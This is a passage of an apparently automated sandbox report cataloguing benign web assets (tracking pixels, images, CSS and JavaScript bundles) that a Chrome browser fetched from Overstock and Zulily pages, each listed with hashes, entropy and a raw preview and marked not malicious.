                                                                                                                                                                                    URL:https://14698185.fls.doubleclick.net/activityi;dc_pre=COuJreOZtokDFc7jEQgdVLkSOQ;src=14698185;type=overs0;cat=produ0;ord=6084905068702;npa=0;auiddc=164462539.1730294546;u1=;u2=41929634-000-010;u3=361.59;ps=1;pcor=1454163961;uaa=x86;uab=64;uafvl=Google%2520Chrome%3B117.0.5938.149%7CNot%253BA%253DBrand%3B8.0.0.0%7CChromium%3B117.0.5938.149;uamb=0;uam=;uap=Windows;uapv=10.0.0;uaw=0;pscdl=noapi;frm=1;gtm=45fe4as0v9189675736z89176705627za201zb9176705627;gcd=13l3l3l3l1l1;dma=0;tag_exp=101533421~101823848~101878899~101878944~101925629;epver=2;~oref=https%3A%2F%2Fwww.overstock.com%2Fwpm%40d9f539ffw0e1474c4pae8b6d69m179c86ad%2Fcustom%2Fweb-pixel-17006751%4084%2Fsandbox%2Fmodern%2Fproducts%2Fmia-oversized-modular-sectional-fabric-sofa-38169103%3Fvariant%3D50892052725919%26searchidx%3D0?
                                                                                                                                                                                    Preview:<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"><html><head><title></title></head><body style="background-color: transparent"><img src="https://adservice.google.com/ddm/fls/z/dc_pre=COuJreOZtokDFc7jEQgdVLkSOQ;src=14698185;type=overs0;cat=produ0;ord=6084905068702;npa=0;auiddc=*;u1=;u2=41929634-000-010;u3=361.59;ps=1;pcor=1454163961;uaa=x86;uab=64;uafvl=Google%2520Chrome%3B117.0.5938.149%7CNot%253BA%253DBrand%3B8.0.0.0%7CChromium%3B117.0.5938.149;uamb=0;uam=;uap=Windows;uapv=10.0.0;uaw=0;pscdl=noapi;frm=1;gtm=45fe4as0v9189675736z89176705627za201zb9176705627;gcd=13l3l3l3l1l1;dma=0;tag_exp=101533421~101823848~101878899~101878944~101925629;epver=2;~oref=https%3A%2F%2Fwww.overstock.com%2Fwpm%40d9f539ffw0e1474c4pae8b6d69m179c86ad%2Fcustom%2Fweb-pixel-17006751%4084%2Fsandbox%2Fmodern%2Fproducts%2Fmia-oversized-modular-sectional-fabric-sofa-38169103%3Fvariant%3D50892052725919%26searchidx%3D0"/></body></html>
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:RIFF (little-endian) data, Web/P image
                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                    Size (bytes):1858
                                                                                                                                                                                    Entropy (8bit):7.035473028411798
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:48:HIl/XflECKkA8KieCxrI3ciqSgyamiW7Gmjfoz5T:HIl/X9VPeCRMcSgyaOGmzodT
                                                                                                                                                                                    MD5:26A9D41051F3AD37CBB28D73B071FBA4
                                                                                                                                                                                    SHA1:2DE6CE2D524F5D80DEAF5138307E375664B9D19F
                                                                                                                                                                                    SHA-256:1B250144F89BB45175964C7FA4FE781A2CE00B1EAAC8DD65F7F4AAF43AD2111D
                                                                                                                                                                                    SHA-512:43470452DC43C39ECC35ED474AB05A81BD854EFEE14FE68958760B968437BD9E5CEF54A3D396D87D05E38DE08073C084F61DED8240C75282A6A8FA80469A6162
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    URL:https://www.overstock.com/cdn/shop/files/Mia-Oversized-Modular-Sectional-Fabric-Sofa-Set_bd11eded-1ca0-44aa-9089-f49ec38f58b7.jpg?v=1729322908&width=80
                                                                                                                                                                                    Preview:RIFF:...WEBPVP8X....(...O..O..ICCP........lcms....mntrRGB XYZ .........).9acspAPPL...................................-lcms................................................desc......._cprt...L....wtpt...X....rXYZ...l....gXYZ........bXYZ........rTRC.......@gTRC.......@bTRC.......@desc........c2ci............curv...............c...k...?.Q.4!.).2.;.F.Qw].kpz....|.i.}...0..text....CC0.XYZ ...............-XYZ ......o...8.....XYZ ......b.........XYZ ......$.........VP8 .........*P.P.>1..B.!!.\.T ....b|....j..f..}...OO.6.{...]1.jp...^...p.#..w...?....n..kNH+sY..s...........k..0....KX.....XI...,^..$.:.\...7.z....-i.X.~..N..F..z....i~7'0.=.d_/J.|....t..i".o.3..%....K5zb.n..MN..k..K.9.................{%[.Gd...V..>;..].t?.l.....(.y'....`.t.4).d;e....:.'..(.1..\.t.....uMc...g..w..wjS..7........|@.s....=..;.y.k.q9p\e.P.5.3.s0.w#..8.B........~%...C.l.V.T.1.....\t1.#...b..a..h....u.<..8t...t#|OYB..t.v.v .&.Co.:.zd.....n%......;.)..+..M.s&. ~`.E..c...n.).u.(../P.Rc...Ea......B
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:RIFF (little-endian) data, Web/P image, VP8 encoding, 805x447, Scaling: [none]x[none], YUV color, decoders should clamp
                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                    Size (bytes):6204
                                                                                                                                                                                    Entropy (8bit):7.940926040062209
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:96:K+2Zf3WGzWyiVj2gvTelrBUbfRGiRkr+KKTnO0ugiB4TYefY9A:WavHTsk4wa+7i0Ly4Tua
                                                                                                                                                                                    MD5:0F5496011B8272B0440068BF9AD7A46F
                                                                                                                                                                                    SHA1:C89D3CB6CEEAAABF18E2D19418A0EE906E5A9151
                                                                                                                                                                                    SHA-256:9DAA1545C942D94E3D6DD5AD5E0112BB74C5FFCE326B3E2AF9992C5B307FC2A8
                                                                                                                                                                                    SHA-512:97EBD9BB7436FF0610DE4C8C7F6CC1913645E8FCFC5FDEC5BFF1718EDA2BCD2B87D47296E7F4741D93335E17141A0F785B5679C388AF3344F3D618B879D1941E
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    URL:https://ak1.ostkcdn.com/img/mxc/09052024-MOPS-Angi-Domestic_Desktop_A7.jpg
                                                                                                                                                                                    Preview:RIFF4...WEBPVP8 (........*%...?%..Y.?.*$.y..$.gn..A.......A.-7..G............?......&..N...ffffffe,.H.4g+..tCF../.]..jO..#,.......VK..=h....k~...4..$..m...7!L....|..Y-....8L.\.@...|.k[.~.D.#$yT.+..f..... .?..6..z...N...T.z.~.i.|P6...;......K$)LD.O.@.,Y..D..{..u..sZ7.P.....d.M.S333(...C../....1(....Y.$.#..r.)./.\T.......2]t.Zv$.d.A..o...7B...!...nK.M.S3333332.?#.?eky"(W"{8L.%..._\..,...=....P.+...}.5v....1>.by...M.n8^...D..,....d.GK|=.Z.}_@...'akP6..z.Q.S...0pk/.B.n.....s..W.W+:8.C.nk..Q..*#..Ug.....##e..7...CP6..z...M..z..~*.jI"f...E..(.8.H.~.#.$3AL5._.......}f*.F.'....[......CP6..z...M.`...C......b.....ci.L.D.woX......[S..f.N.....q*....@.v.z|B.l.t..ffffe.1.J...;.Y.}..O.....,'.A.@....`;h.I....n......*6.TO.4.^'.6.:..r.......|...T>...>...nBW..O...d.M.pw....y.B."......x".E`.9Z.....a..ffffffffffe.w.....sH...jd.H.eS.....%_7.Be8...XLI..@......3....{5.Y..^.~\(j...O]6.9....{...t[[.Op.aFh:f{.;I..I...o(......<d.K.....?`.x._.=t.d.M.R.4..T...R.^E#
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:ASCII text, with very long lines (1742)
                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                    Size (bytes):1890
                                                                                                                                                                                    Entropy (8bit):4.9801093984738065
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:24:B/9WzVumZOkUe32MejgkJMTucwmlm+tBa9i6deNaq0fmxNL5N8:BIz86qjRMZWi6PmxNL5N8
                                                                                                                                                                                    MD5:8599EBC49567CBAF922FBCD513658B77
                                                                                                                                                                                    SHA1:88D5AF133002EE464105DC85D8678175891EBB05
                                                                                                                                                                                    SHA-256:2810851F20A075EDC2014A8A5D3CCBC8B0B11C7FC979D311A555EFD2C73AFD5D
                                                                                                                                                                                    SHA-512:7FC83591DA5F858E5D41A587A6B1DF3CFDD9AF3653EDE2B28C665C4F1023765A9D7D716569B7CA365A49C034EAE3C8968E23C8B0DEA266281697A5970C97F5A8
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    URL:https://www.overstock.com/cdn/shop/t/224/assets/flickity.css?v=138020229515364061511730157903
                                                                                                                                                                                    Preview:/*! Flickity v2.3.0.https://flickity.metafizzy.co.---------------------------------------------- */.flickity-enabled{position:relative}.flickity-enabled:focus{outline:none}.flickity-viewport{overflow:hidden;position:relative;height:100%}.flickity-slider{position:absolute;width:100%;height:100%}.flickity-enabled.is-draggable{-webkit-tap-highlight-color:transparent;-webkit-user-select:none;-moz-user-select:none;-ms-user-select:none;user-select:none}.flickity-enabled.is-draggable .flickity-viewport{cursor:move;cursor:-webkit-grab;cursor:grab}.flickity-enabled.is-draggable .flickity-viewport.is-pointer-down{cursor:-webkit-grabbing;cursor:grabbing}.flickity-button{position:absolute;background:#ffffffbf;border:none;color:#333}.flickity-button:hover{background:#fff;cursor:pointer}.flickity-button:focus{outline:none;box-shadow:0 0 0 5px #19f}.flickity-button:active{opacity:.6}.flickity-button:disabled{opacity:.3;cursor:auto;pointer-events:none}.flickity-button-icon{fill:currentColor}.flickity-
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:ASCII text, with very long lines (22100), with no line terminators
                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                    Size (bytes):22100
                                                                                                                                                                                    Entropy (8bit):5.299331455000662
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:192:R02QVqJGjJGUK3fH2eJGk6pKp420RLnuz2ZJGpufWZyH4RGo2IITw2M4GSGOyQGh:g5SSvuzwdyDhzOyJD9T4xB0gBvwvyW
                                                                                                                                                                                    MD5:FC1396E6F4F09A61E38F69A8870A2C8B
                                                                                                                                                                                    SHA1:88F3E1BAD4A54F6B31681B007096054F7C2AF1A8
                                                                                                                                                                                    SHA-256:9FFC975CA2DD3DA095C11C58018D1692D573617A51C3A0228571DF611C98E8B3
                                                                                                                                                                                    SHA-512:8B099A8DE24663465101AB28CB0A14FD9FC180F55A8FE08B937D681A698EBB1571157DB5F6EFA1EA72535E0F264F9C05073714B38C4B480E8C4FCA46F4861FC1
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    URL:https://ak1.ostkcdn.com/static/page-triggers.424.chunk.9ffc975ca2dd3da095c11c58018d1692d573617a51c3a0228571df611c98e8b3.js
                                                                                                                                                                                    Preview:(self.webpackChunkpage_triggers=self.webpackChunkpage_triggers||[]).push([[424],{6578:function(e,r,t){"use strict";var o=t(5318);Object.defineProperty(r,"__esModule",{value:!0}),r.default=function(e,r,t){var o=Boolean(navigator.userAgent.match(/Trident|MSIE/gim)),a=Boolean(navigator.userAgent.match(/YaBrowser|OPR/gim)),i=(0,n.getSessionStorage)("browserUpdate"),c=(0,n.getCookie)("pageTriggers","browserUpdate","browserUpdateExpiration");(o||a&&!i)&&!t&&((0,n.setCookie)("pageTriggers",s(s({},c),{},{browserUpdateExpiration:(new Date).getTime()})),a&&(0,n.setSessionStorage)("browserUpdate"),e(!0),r.current=!1)};var a=o(t(9713)),n=t(2615);function i(e,r){var t=Object.keys(e);if(Object.getOwnPropertySymbols){var o=Object.getOwnPropertySymbols(e);r&&(o=o.filter((function(r){return Object.getOwnPropertyDescriptor(e,r).enumerable}))),t.push.apply(t,o)}return t}function s(e){for(var r=1;r<arguments.length;r++){var t=null!=arguments[r]?arguments[r]:{};r%2?i(Object(t),!0).forEach((function(r){(0,a
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:ASCII text, with very long lines (12303)
                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                    Size (bytes):12394
                                                                                                                                                                                    Entropy (8bit):5.28840332468053
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:192:rek+w1w+FCH501fo7R1qpu5TMSU9i/VY8cJwfc:reLOjFSGxuSKJfc
                                                                                                                                                                                    MD5:EF0D102241F3429C9FC7FD06C71D22F9
                                                                                                                                                                                    SHA1:676C840425BC2947FFD343927B1CEC99195154A6
                                                                                                                                                                                    SHA-256:5F6422710C50E854670D93B8E9EF25DF9357BB4EABF40AFD2D8664C390C022D6
                                                                                                                                                                                    SHA-512:5119F9EAB0DEEB8776094A7AB1219A0CD7421CAF31ED1825002213B93457EE44E1798405729ADBD9D23853E1849C047869B5F225EF2A4D14897CF5EA409D7942
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    URL:https://www.zulily.com/wpm@d9f539ffw0e1474c4pae8b6d69m179c86ad/app/web-pixel-749895996@a46b87f88a4ff97a9490f9aa4799ba7b/pixel.modern.js
                                                                                                                                                                                    Preview:(function(shopify) {.(()=>{var se="WebPixel::Render";var Y=e=>shopify.extend(se,e);var K={config:0,set:1,page_view:2,view_item:3,add_to_cart:4,purchase:5,begin_checkout:6,search:7,add_payment_info:8,update:9,default:10},ce={send_to:0,page_path:1,page_title:2,page_location:3,ignore_referrer:4,ecomm_prodid:5,ecomm_totalvalue:6,ecomm_pagetype:7,items:8,id:9,name:10,brand:11,category:12,coupon:13,price:14,quantity:15,variant:16,value:17,currency:18,tax:19,shipping:20,search_term:21,total:22,transaction_id:23,ad_storage:24,ad_user_data:25,ad_personalization:26,analytics_storage:27},le={config:[],set:[],page_view:["send_to"],view_item:["send_to","ecomm_prodid"],add_to_cart:["send_to","ecomm_prodid"],purchase:["send_to","transaction_id"],begin_checkout:["send_to"],search:["send_to"],add_payment_info:["send_to"]};var fe="",ge=function(e){fe=e},Pe=Math.floor(Math.random()*2147483648),pe=function(){if(arguments[0]==="js")return;let r=window.dataLayer.filter(o=>Object.prototype.toString.call(o)==
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 640x238, components 3
                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                    Size (bytes):13322
                                                                                                                                                                                    Entropy (8bit):7.936497813740661
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:384:x/zif7Yq+J4hzGRa5R4uhqBmCgYpxykRgg6mK5z6:x/WDYV4hOaT4uABmjrhkK5z6
                                                                                                                                                                                    MD5:E0DE3B0E486AA176B9EF33295AE31746
                                                                                                                                                                                    SHA1:FF3D5D17F7CE69D26FB75338434B87CA5FABFED9
                                                                                                                                                                                    SHA-256:634E5B4F5E2A07F9812473DA329591264901004F2C3B13F74D9D889205069020
                                                                                                                                                                                    SHA-512:B374F1837208F8339ED2B4B9D501236D923F16EB447FAB5268F7C6C65EC9356294D553C264D3344C1479561931FCC6CE1612841CB582DF20F4289DEEB3DC9EAC
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    Preview:......JFIF..........................................................$...........$.6.".(.".".(.".6.0.:./.,./.:.0.V.D.<.<.D.V.d.T.O.T.d.y.l.l.y........................................................$...........$.6.".(.".".(.".6.0.:./.,./.:.0.V.D.<.<.D.V.d.T.O.T.d.y.l.l.y......................."..........3................................................................Q.......e..zV.....&yE.R.:I.&.Lf...A.....H......H........5B....5.T.....X..\z.5qfF..w`..v....2..N....gA8.f.4R.(..T..).I..$.3.$..b.W.N.LL......W59.o.........o....v.....W\.c...6@......`.6..p.H....n.f.$..S:.(....K...0....'r....V\.........^.g.6.<....~{.p.{......VxKi9.Z.*.^5X..]...E...c.oE.`wd....j..k.......q..Za.Z..]...........m!.0.Fbp...Q .L...64..`.6.......+V..y....&.'7..i.Uk:.[Y..g.."..e|.M..o#^C..rN.:....(.bz...q`...1\3..;..q|.....'...Ux.v..Fq.)iv!.G....W-f..b...O*..r.6....b`f$.D.71..@..F...F<...w.E.........{..j.......?...S.DLT....@....`..oM...J.&L"..I.1.v._.........7....@..z..V.H+/...m!n..<.].
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:ASCII text, with very long lines (1117)
                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                    Size (bytes):4790
                                                                                                                                                                                    Entropy (8bit):5.261056851891377
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:96:pnR1QEnN5ejImVB/b1ybFCe249zz7DdE/pbfnKfIfkdIMW1KQJUG6+hXNjNzmHpa:pnFnNojImVVMbFxEhbnKfIfkD3G6+hXZ
                                                                                                                                                                                    MD5:8E3E64F462873A83DA2DD6BF0B5A4DC8
                                                                                                                                                                                    SHA1:874EBEAF968E91CE28F7D552B0A8D7258D072EDE
                                                                                                                                                                                    SHA-256:14A57415F5C9858B76F7FA75C63BAFCA79AE40B88D2E7724E68CB927015EBEA8
                                                                                                                                                                                    SHA-512:FB3F2F178A65452E4B91D56C6B5CA5C2543B490D25AD1E786B5B1FA96041242FF254C8D881DD6A44EEC205BDCC4E91479CEA84EF3AE0FF33F15A907A9EC95771
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    URL:https://tags.tiqcdn.com/utag/overstock/main/prod/utag.251.js?utv=ut4.46.202407261838
                                                                                                                                                                                    Preview://tealium universal tag - utag.251 ut4.0.202409301659, Copyright 2024 Tealium.com Inc. All Rights Reserved..window["MovableInkTrack"]="mitr";window["mitr"]=window["mitr"]||function(){(window["mitr"].q=window["mitr"].q||[]).push(arguments);};try{(function(id,loader){var u={"id":id};utag.o[loader].sender[id]=u;if(utag.ut===undefined){utag.ut={};}.var match=/ut\d\.(\d*)\..*/.exec(utag.cfg.v);if(utag.ut.loader===undefined||!match||parseInt(match[1])<41){u.loader=function(o,a,b,c,l,m){utag.DB(o);a=document;if(o.type=="iframe"){m=a.getElementById(o.id);if(m&&m.tagName=="IFRAME"){b=m;}else{b=a.createElement("iframe");}o.attrs=o.attrs||{};utag.ut.merge(o.attrs,{"height":"1","width":"1","style":"display:none"},0);}else if(o.type=="img"){utag.DB("Attach img: "+o.src);b=new Image();}else{b=a.createElement("script");b.language="javascript";b.type="text/javascript";b.async=1;b.charset="utf-8";}if(o.id){b.id=o.id;}for(l in utag.loader.GV(o.attrs)){b.setAttribute(l,o.attrs[l]);}b.setAttribute("src",o
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:ASCII text, with no line terminators
                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                    Size (bytes):44
                                                                                                                                                                                    Entropy (8bit):4.32365506293191
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:3:Ht2jDGuKEnxCm:mauKEEm
                                                                                                                                                                                    MD5:7AB1E298FB2492D70AEC6C7F3D9D9D7D
                                                                                                                                                                                    SHA1:9CD47D411750662B3C684C8960A13B7F1A7CF170
                                                                                                                                                                                    SHA-256:F4152C2B1FD08FDAA51E4523735F62CEB823AE373BB0164ABCE9643249AA07AA
                                                                                                                                                                                    SHA-512:4A224612E9340737AA105D1EC3E9BF569394A708B60170212DFD5D7D6D01606ABD0ACCFAEF2CBE5F09D05A933F95D8108B610468076F28EAAAA92D32A40FE331
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    URL:https://content-autofill.googleapis.com/v1/pages/ChVDaHJvbWUvMTE3LjAuNTkzOC4xNDkSEAkxF_tq3OJ9cRIFDQPwgdoSEAnloGMNKbc-ChIFDQPwgdo=?alt=proto
                                                                                                                                                                                    Preview:CgkKBw0D8IHaGgAKFAoSDQPwgdoaBAgJGAEaBQiaARgC
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                    Size (bytes):1006
                                                                                                                                                                                    Entropy (8bit):4.836413942661106
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:24:2oUChUCKwVbV8Hno8/TnUn+fmLoaiuHc1deB/:dZhZKhHnoibUn2mLU1deB/
                                                                                                                                                                                    MD5:6E0DC54411BDE95A291A6933C2C63209
                                                                                                                                                                                    SHA1:F30E131D08E18B436566A0DD51FFC008E3AE42EA
                                                                                                                                                                                    SHA-256:3B20F1DC4E3B8C38FCB0F84DE3F9379124802EA313DAA293382E71DA116042B8
                                                                                                                                                                                    SHA-512:DB673798EA8D75A153ADCF2EADFFF0C21184CB6862F3A6D642948C3AB1442E1FBF64F217D5761BC7F5207355C065518ED6B15AF4E1DED19DD72A7F090FF5D147
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    Preview:(function () {. const { currentScript } = document;. const script =. new URL(currentScript.src) || new URL(currentScript.getAttribute("src"));.. const appId = script.searchParams.get("appId");. const environment = script.searchParams.get("environment");.. const srcUrls = {. local: "http://localhost:3005/dist/tc-plugins.es.js", // local dev server URL defined in vite.config.js. staging:. "https://unpkg.com/tapcart-capture-kit@staging/dist/tc-plugins.es.js",. production:. "https://unpkg.com/tapcart-capture-kit@production/dist/tc-plugins.es.js",. };. const srcUrl = srcUrls[environment] || srcUrls.production;.. window["tapcartParams"] = { appId, environment };.. // Create a new script element with type module. const moduleScript = document.createElement("script");. moduleScript.type = "module";. moduleScript.src = srcUrl;. document.head.appendChild(moduleScript);.. moduleScript.onerror = function () {. console.error("The script failed to load.");. };
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:ASCII text, with very long lines (65536), with no line terminators
                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                    Size (bytes):129979
                                                                                                                                                                                    Entropy (8bit):5.262056499957794
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:1536:VyhOCvjwxJZzcXI6+jyXu4KaEV/gbXc20ZHLwD8EaBtrRyX1Z:VyhOC0x96ruNiXcvh0jyxRyXj
                                                                                                                                                                                    MD5:623DA2092AB9E81400D81FAD9017F0BA
                                                                                                                                                                                    SHA1:1C76F260E73E1229548D84EC1A8A3A2E8C09D056
                                                                                                                                                                                    SHA-256:8E89E1175A6145D737446D673FFA073F4C469C8FE3972F5287B1E7E9B241282B
                                                                                                                                                                                    SHA-512:D7934C8E66923FBC1E3783E58DCAACF6801E7B53028EBA45AA3983721F7E5469F3C92D6A9872E593C31DDC87CF8547CFDA950802A8EDD7D92576C7F078E6282D
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    URL:https://ak1.ostkcdn.com/static/homepage/_next/static/chunks/framework-5f4595e5518b5600.js
                                                                                                                                                                                    Preview:"use strict";(self.webpackChunk_N_E=self.webpackChunk_N_E||[]).push([[774],{4448:function(e,t,n){var r=n(7294),l=n(6086),a=n(3840);function o(e){for(var t="https://reactjs.org/docs/error-decoder.html?invariant="+e,n=1;n<arguments.length;n++)t+="&args[]="+encodeURIComponent(arguments[n]);return"Minified React error #"+e+"; visit "+t+" for the full message or use the non-minified dev environment for full errors and additional helpful warnings."}if(!r)throw Error(o(227));var u=new Set,i={};function s(e,t){c(e,t),c(e+"Capture",t)}function c(e,t){for(i[e]=t,e=0;e<t.length;e++)u.add(t[e])}var f=!("undefined"===typeof window||"undefined"===typeof window.document||"undefined"===typeof window.document.createElement),d=/^[:A-Z_a-z\u00C0-\u00D6\u00D8-\u00F6\u00F8-\u02FF\u0370-\u037D\u037F-\u1FFF\u200C-\u200D\u2070-\u218F\u2C00-\u2FEF\u3001-\uD7FF\uF900-\uFDCF\uFDF0-\uFFFD][:A-Z_a-z\u00C0-\u00D6\u00D8-\u00F6\u00F8-\u02FF\u0370-\u037D\u037F-\u1FFF\u200C-\u200D\u2070-\u218F\u2C00-\u2FEF\u3001-\uD7FF
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:ASCII text, with very long lines (21081), with no line terminators
                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                    Size (bytes):21081
                                                                                                                                                                                    Entropy (8bit):5.3370880542408115
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:192:On9WYgWYRwdEtdgLXp/Pgz/cVeZIlEiIM/cVeZlnIjESnWQWEOjAxOVwdODFpheL:Onoc5ewIeqEV3zFyKwjnxZvV28Dr
                                                                                                                                                                                    MD5:BE464C4118B5C8802DBC44A7A5A3C056
                                                                                                                                                                                    SHA1:3C11F42EA334475BE7C8FFFC51612B80F1AD95AB
                                                                                                                                                                                    SHA-256:4337C5B6FF739BE1D8C6AFA2193AEE802FE9AE694BF97CBF1C40E2EB970E628E
                                                                                                                                                                                    SHA-512:DC01146D09350FE2871ADA0B04747BA60FBDE078769E7CF3AEE10A66D1772853118FB2654534685EE47682C1FC9E71A0F07DC9EE0DDDC586EDB028AB46C32641
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    URL:https://ak1.ostkcdn.com/static/page-triggers.7.chunk.4337c5b6ff739be1d8c6afa2193aee802fe9ae694bf97cbf1c40e2eb970e628e.js
                                                                                                                                                                                    Preview:"use strict";(self.webpackChunkpage_triggers=self.webpackChunkpage_triggers||[]).push([[7],{4857:function(e,t,n){n.r(t);var l=n(8081),i=n.n(l),a=n(3645),o=n.n(a)()(i());o.push([e.id,".cl-alert {\n align-items: center;\n background-color: #e7e8ea;\n border-radius: 4px;\n color: #545658;\n display: flex;\n font-size: 14px;\n justify-content: space-between;\n line-height: 1.5;\n margin-bottom: 8px;\n padding: 14px 16px;\n position: relative;\n}\n.cl-alert a:link,\n.cl-alert a:hover,\n.cl-alert a:active,\n.cl-alert a:visited {\n color: currentColor;\n}\n.cl-alert svg {\n fill: currentColor;\n}\n.cl-alert-close-btn {\n background: none;\n border: none;\n color: currentColor;\n line-height: 1;\n padding: 8px;\n position: absolute;\n right: 4px;\n top: 50%;\n transform: translateY(-50%);\n}\n.cl-alert-close-icon {\n fill: currentColor;\n height: 24px;\n width: 24px;\n}\n.cl-alert-has-close-btn {\n padding-right: 48px;\n}\n.cl-alert-attention.cl-alert-mobile {\n back
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:ASCII text, with very long lines (47531)
                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                    Size (bytes):47532
                                                                                                                                                                                    Entropy (8bit):5.399631966931825
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:768:khCcfnNm52VJHkmnX7knsQMcvjdMdSzCTLos4P8X60Yo6VA3H1KCZ2EHCb+I29Na:kbNm8JHnnX7ksG7CT0K6V4P8
                                                                                                                                                                                    MD5:808A57CAE0B6FEE71F46EFDDED44B348
                                                                                                                                                                                    SHA1:DD570A24C8BDA1B391AA1DDEA6004125818E579A
                                                                                                                                                                                    SHA-256:5B75AC6F98994352699841DFFA6E562725EBBD0005C539946AD3625EC550EB0F
                                                                                                                                                                                    SHA-512:3F06DFBFDEDE9BB4270EB1BBBE29FFBDB6E19DC0AA8234E1A2B92D84F0737555031231965151EFC386510193343985BCEC63062484BBD8EC0540A94A0109B765
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    Preview:"use strict";(function(){function Wt(e,r,n,o,c,l,h){try{var p=e[l](h),f=p.value}catch(s){n(s);return}p.done?r(f):Promise.resolve(f).then(o,c)}function Ht(e){return function(){var r=this,n=arguments;return new Promise(function(o,c){var l=e.apply(r,n);function h(f){Wt(l,o,c,h,p,"next",f)}function p(f){Wt(l,o,c,h,p,"throw",f)}h(void 0)})}}function V(e,r){return r!=null&&typeof Symbol!="undefined"&&r[Symbol.hasInstance]?!!r[Symbol.hasInstance](e):V(e,r)}function Me(e,r,n){return r in e?Object.defineProperty(e,r,{value:n,enumerable:!0,configurable:!0,writable:!0}):e[r]=n,e}function Fe(e){for(var r=1;r<arguments.length;r++){var n=arguments[r]!=null?arguments[r]:{},o=Object.keys(n);typeof Object.getOwnPropertySymbols=="function"&&(o=o.concat(Object.getOwnPropertySymbols(n).filter(function(c){return Object.getOwnPropertyDescriptor(n,c).enumerable}))),o.forEach(function(c){Me(e,c,n[c])})}return e}function Ar(e,r){var n=Object.keys(e);if(Object.getOwnPropertySymbols){var o=Object.getOwnPropertyS
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:ASCII text, with very long lines (21856)
                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                    Size (bytes):52387
                                                                                                                                                                                    Entropy (8bit):5.397303672227873
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:1536:KXn2+GjozCrDHJVZ/9ywhENZNtT3YH6/90l:KXnp2ywhENZrYHa90l
                                                                                                                                                                                    MD5:7EE104753099F9F00003724EB0A4C433
                                                                                                                                                                                    SHA1:1D755195CA80161CA0D9694E4A1A18B42720A0AC
                                                                                                                                                                                    SHA-256:0BA6B163F965F258C24888CF11C6DFE0D044DE0800284DA2E78A3FAF7BD12925
                                                                                                                                                                                    SHA-512:CB0916F1D31C1D73DAC81D742B38F239B5B07A9C84560EA318E6D05BCE16721433B722035143E0F642B1EB136577BD2416719B4BEBED37AEB048700C4EC8FE1F
                                                                                                                                                                                    Malicious:false
